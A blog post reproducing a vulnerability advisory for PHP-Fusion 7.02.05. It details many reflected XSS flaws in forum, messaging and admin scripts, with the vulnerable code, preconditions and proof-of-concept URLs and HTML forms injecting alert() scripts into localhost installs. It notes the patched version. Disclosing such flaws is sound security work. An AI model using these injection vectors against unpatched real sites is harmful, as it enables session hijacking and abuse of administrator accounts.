Blogger Widgets

Monday, May 27, 2013

PHP-Fusion 7.02.05 XSS

7:32 AM Unknown No comments


https://encrypted-tbn3.gstatic.com/images?q=tbn:ANd9GcSHtyiEFujDPkerw0g-JWdVmK35nPnYhLvBlkALg4WY_8dujydcBg 
Description of vulnerable software:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

PHP-Fusion is a light-weight open-source content management system (CMS) written in PHP 5. It utilises a MySQL database to store your site content and includes a simple, comprehensive administration system. PHP-Fusion includes the most common features you would expect to see in many other CMS packages.

http://www.php-fusion.co.uk/news.php
http://sourceforge.net/projects/php-fusion/


Vulnerable is version 7.02.05 and possibly older versions.

New, patched version 7.02.06 available here:

http://www.php-fusion.co.uk/news.php?readmore=569
http://www.php-fusion.co.uk/downloads.ph...oad_id=264

Reflected XSS in "forum/viewthread.php"
Reason: insufficient sanitization of html output
Attack vector: user-supplied GET parameter "highlight"
Preconditions:
1. there must exist at least one forum thread

Php script "forum/viewthread.php" line 361:

Code:
// highlight jQuery plugin
    if (isset($_GET['highlight'])) {
        $words = explode(" ", urldecode($_GET['highlight']));
        $higlight = ""; $i = 1; $c_words = count($words);
        foreach ($words as $hlight) {
            $higlight .= "'".$hlight."'";
            $higlight .= ($i < $c_words ? "," : "");
            $i++;
        }
        add_to_head("<script type='text/javascript' src='".INCLUDES."jquery/jquery.highlight.js'></script>");
        $highlight_js .=   "jQuery('.search_result').highlight([".$higlight."],{wordsOnly:true});";
Test (parameter "thread_id" must be valid):

http://localhost/phpfusion70205/forum/viewthread.php?thread_id=20&highlight=%2527]);});alert(123);/*

Reflected XSS in "messages.php"
Reason:
1. uninitialized variables "$user_list" and "$user_types"
2. insufficient sanitization of html output
Attack vector: user-supplied parameters "user_list", "user_types"
Preconditions:
1. logged in as user
2. register_globals=on

Php script "messages.php" line 482:
Code:
if ($_GET['msg_send'] == "0") {
    echo "<select name='msg_send' class='textbox'>\n".$user_list."</select>\n";
Test:
Code:
<html><body><center>
<form action="http://localhost/phpfusion70205/messages.php?msg_send=0" method="post">
<input type="hidden" name="chk_sendtoall" value="0">
<input type="hidden" name="user_list" value="</select><script>alert(123);</script>">
<input type="submit" value="Test">
</form>
</center></body></html>
Similar problem is related to variable "$user_types", only in this case admin
access level is needed:

Php script "messages.php" line 490:
Code:
if (iADMIN && !isset($_GET['msg_id'])) {
    echo "<label><input name='chk_sendtoall' type='checkbox' ".$sendtoall_chk." />\n";
    echo "".$locale['434'].":</label> <select name='msg_to_group' class='textbox'>\n".$user_types."</select>\n";

Reflected XSS in "infusions/shoutbox_panel/shoutbox_admin.php"
Reason:
1. uninitialized variable "$message"
2. insufficient sanitization of html output
Attack vector: user-supplied parameter "message"
Preconditions:
1. logged in as admin with shoutbox administration privileges
2. register_globals=on

Php script "infusions/shoutbox_panel/shoutbox_admin.php" line 149:
Code:
if (isset($message) && $message != "") {
echo "<div id='close-message'><div class='admin-message'>".$message."</div></div>\n"; }
Test (parameter "aid" needs to be valid):

http://localhost/phpfusion70205/infusions/shoutbox_panel/shoutbox_admin.php?
aid=e017e24eb00e8ccf&page=settings&message=<body+onload=alert(123);+

Reflected XSS in "administration/news.php"
Reason:
1. uninitialized variable "$message"
2. insufficient sanitization of html output
Attack vector: user-supplied parameter "message"
Preconditions:
1. logged in as admin with news administration privileges
2. register_globals=on

Php script "administration/news.php" line 31:
Code:
if (isset($_GET['error']) && isnum($_GET['error'])) {
    if ($_GET['error'] == 1) {
        $message = $locale['413'];
...
    if ($message) {    echo "<div id='close-message'>
      <div class='admin-message'>".$message."</div></div>\n"; }
}
if (isset($_GET['status'])) {
    if ($_GET['status'] == "sn") {
        $message = $locale['410'];
...
    if ($message) {    echo "<div id='close-message'>
      <div class='admin-message'>".$message."</div></div>\n"; }
}
Tests (parameter "aid" needs to be valid):

http://localhost/phpfusion70205/administration/news.php?aid=0ebd6f54040890e8
&error=9&message=<body+onload=alert(123);+

http://localhost/phpfusion70205/administration/news.php?aid=0ebd6f54040890e8
&status=1&message=<body+onload=alert(123);+

Reflected XSS in "administration/panel_editor.php"
Reason:
1. uninitialized variable "$panel_list"
2. insufficient sanitization of html output
Attack vector: user-supplied parameter "panel_list"
Preconditions:
1. logged in as admin with panel editing privileges
2. register_globals=on

Php script "administration/panel_editor.php" line 32:
Code:
while ($folder = readdir($temp)) {
    if (!in_array($folder, array(".","..")) && strstr($folder, "_panel")) {
        if (is_dir(INFUSIONS.$folder)) $panel_list[] = $folder;
    }
}
...
for ($i=0;$i < count($panel_list);$i++) {
        echo "<option".($panel_filename == $panel_list[$i] ?
            " selected='selected'" : "").">".$panel_list[$i]."</option>\n";
Test (parameter "aid" needs to be valid):
Code:
<html><body><center>
<form action="http://localhost/phpfusion70205/administration/panel_editor.php?aid=e017e24eb00e8ccf" method="post">
<input type="hidden" name="panel_list[]" value="<script>alert(123);</script>">
<input type="submit" value="Test">
</form>
</center></body></html>

Reflected XSS in "administration/phpinfo.php"
Reason: insufficient sanitization of html output
Attack vector: User-Agent string
Preconditions:
1. logged in as admin with php info view privileges

Php script "administration/phpinfo.php" line 46:
Code:
$phpinfo .= "<tr>\n<td class='tbl2' style='width:20%'>".$locale['410']."</td>
<td class='tbl1' style='text-align:right'>".$_SERVER['HTTP_USER_AGENT']."</td></tr>\n";

Reflected XSS in "administration/bbcodes.php"
Reason:
1. uninitialized variable "$__BBCODE__"
2. insufficient sanitization of html output
Attack vector: user-supplied parameter "__BBCODE__"
Preconditions:
1. logged in as admin with bbcode settings change privileges
2. register_globals=on

Php script "administration/bbcodes.php" line 141:
Code:
echo "<td class='$cls'>".$__BBCODE__[0]['description']."</td>\n";
echo "<td class='$cls'>".$__BBCODE__[0]['usage']."</td>\n";

Test (parameter "aid" needs to be valid):

http://localhost/phpfusion70205/administration/bbcodes.php?aid=693ec1754cc0b042
&__BBCODE__[0][description]=<body+onload=alert(123);+

http://localhost/phpfusion70205/administration/bbcodes.php?aid=693ec1754cc0b042
&__BBCODE__[0][usage]=<body+onload=alert(123);+

Reflected XSS in multiple admin scripts, affected parameter "errorMessage"
Reason:
1. uninitialized variables "$error" and "$errorMessage"
2. insufficient sanitization of html output
Attack vector: user-supplied parameters "error" and "errorMessage"
Preconditions:
1. logged in as admin with appropriate privileges
2. register_globals=on

Php script "administration/article_cats.php" line 110:
Code:
if (isset($error) && isnum($error)) {
        if ($error == 1) {
            $errorMessage = $locale['460'];
        } elseif ($error == 2) {
            $errorMessage = $locale['461'];
        }
        if ($errorMessage) { echo "<div id='close-message'>
          <div class='admin-message'>".$errorMessage."</div></div>\n"; }

The same vulnerability exists in four different admin scripts:

1. administration/article_cats.php
2. administration/download_cats.php
3. administration/news_cats.php
4. administration/weblink_cats.php

Tests (parameter "aid" needs to be valid):

http://localhost/phpfusion70205/administration/article_cats.php?
aid=6242719852b67e0e&error=3&errorMessage=<body+onload=alert(123);+

http://localhost/phpfusion70205/administration/download_cats.php?
aid=6242719852b67e0e&error=3&errorMessage=<body+onload=alert(123);+

http://localhost/phpfusion70205/administration/news_cats.php?
aid=6242719852b67e0e&error=3&errorMessage=<body+onload=alert(123);+

http://localhost/phpfusion70205/administration/weblink_cats.php?
aid=6242719852b67e0e&error=3&errorMessage=<body+onload=alert(123);+

Reflected XSS in "administration/articles.php"
Reason: insufficient sanitization of html output
Attack vector: user-supplied POST parameters "body" and "body2"
Preconditions:
1. logged in as admin with articles administration privileges

Php script "administration/articles.php" line 70:
Code:
$bodypreview = str_replace("src='".str_replace("../", "", IMAGES_A),
"src='".IMAGES_A, stripslash($_POST['body']));
$body2preview = str_replace("src='".str_replace("../", "", IMAGES_A),
"src='".IMAGES_A, stripslash($_POST['body2']));
...
echo $bodypreview."\n";
...
echo $body2preview."\n";
Test (parameter "aid" needs to be valid):

Code:
<html><body><center>
<form action="http://localhost/phpfusion70205/administration/articles.php?aid=0ebd6f54040890e8" method="post">
<input type="hidden" name="preview" value="1">
<input type="hidden" name="body" value="<script>alert(123);</script>">
<input type="hidden" name="body2" value="<script>alert(321);</script>">
<input type="submit" value="Test">
</form>
</center></body></html>

Posted in:

0 comments:

Post a Comment

Free Backlinks
Twitter Delicious Facebook Digg Stumbleupon Favorites More

 
Design by Free WordPress Themes | Bloggerized by Lasantha - Premium Blogger Themes | Affiliate Network Reviews